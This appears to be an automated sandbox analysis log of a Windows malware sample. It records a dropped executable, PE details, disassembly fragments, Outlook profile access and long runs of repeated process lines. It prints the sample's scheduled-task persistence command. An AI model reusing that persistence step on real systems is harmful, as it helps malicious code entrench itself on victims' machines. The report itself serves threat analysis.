
Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\winver.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: zE1VxVoZ3W.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zE1VxVoZ3W.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: zE1VxVoZ3W.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: winver.pdb source: zE1VxVoZ3W.exe, 00000009.00000002.1994095406.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.1931684465.000000000103B000.00000004.00000001.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058519534.0000000001028000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.2148372053.0000000001048000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IBBkYiJCUMDfM.exe, 00000014.00000000.1902088127.00000000005AE000.00000002.00000001.01000000.0000000D.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000000.2063497068.00000000005AE000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: zE1VxVoZ3W.exe, 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1996321459.0000000004623000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.000000000496E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1993642718.0000000004452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: zE1VxVoZ3W.exe, zE1VxVoZ3W.exe, 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1996321459.0000000004623000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.000000000496E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1993642718.0000000004452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winver.pdbGCTL source: zE1VxVoZ3W.exe, 00000009.00000002.1994095406.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.1931684465.000000000103B000.00000004.00000001.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058519534.0000000001028000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.2148372053.0000000001048000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: EJBjR.pdb source: zE1VxVoZ3W.exe, ydRhqlPsLsIczR.exe.0.dr
Source:	Binary string: EJBjR.pdbSHA256^ source: zE1VxVoZ3W.exe, ydRhqlPsLsIczR.exe.0.dr

Source: zE1VxVoZ3W.exe

Static PE information: 0xA1BE0117 [Tue Dec 28 05:18:15 2055 UTC]

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07733DB0 push eax; retf	0_2_07733DB1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_07733438 push esp; ret	0_2_077334E1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 0_2_094DF8B0 push esp; retf	0_2_094DF8B1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004149C4 pushad ; retf	9_2_004149C6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_004149E0 push edi; iretd	9_2_00414A14
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040D1BF push ebx; retf	9_2_0040D1C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00414A15 push edi; iretd	9_2_00414A14
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040C226 push ss; iretd	9_2_0040C228
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00403230 push eax; ret	9_2_00403232
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040E477 push eax; iretd	9_2_0040E482
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0041947D push 010D9305h; retf	9_2_00419482
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00401410 push es; iretd	9_2_004014B9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0041F4F0 push eax; retf	9_2_0041F520
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00413F42 push ecx; ret	9_2_00413F41
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00413F6E push ecx; ret	9_2_00413F41
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0041277B push ebx; iretd	9_2_0041277E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00413F1A push ecx; ret	9_2_00413F41
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00413F23 push ecx; ret	9_2_00413F41
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0040AF27 push CB34h; ret	9_2_0040AF32
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_00402FB8 push ecx; retf	9_2_00402FBA
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010509AD push ecx; mov dword ptr [esp], ecx	9_2_010509B6
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_06B0F8B0 push esp; retf	10_2_06B0F8B1
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07143DB0 push eax; retf	10_2_07143DB1
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 10_2_07143438 push esp; ret	10_2_071434E1
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011EC54F push 8B011767h; ret	16_2_011EC554
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011EC54D pushfd ; ret	16_2_011EC54E
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011A09AD push ecx; mov dword ptr [esp], ecx	16_2_011A09B6
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011EC9D7 push edi; ret	16_2_011EC9D9
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_01171368 push eax; iretd	16_2_01171369
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_01171FEC push eax; iretd	16_2_01171FED
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 16_2_011F7E99 push ecx; ret	16_2_011F7EAC

Source: zE1VxVoZ3W.exe	Static PE information: section name: .text entropy: 6.953841026361057
Source: ydRhqlPsLsIczR.exe.0.dr	Static PE information: section name: .text entropy: 6.953841026361057

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

File created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
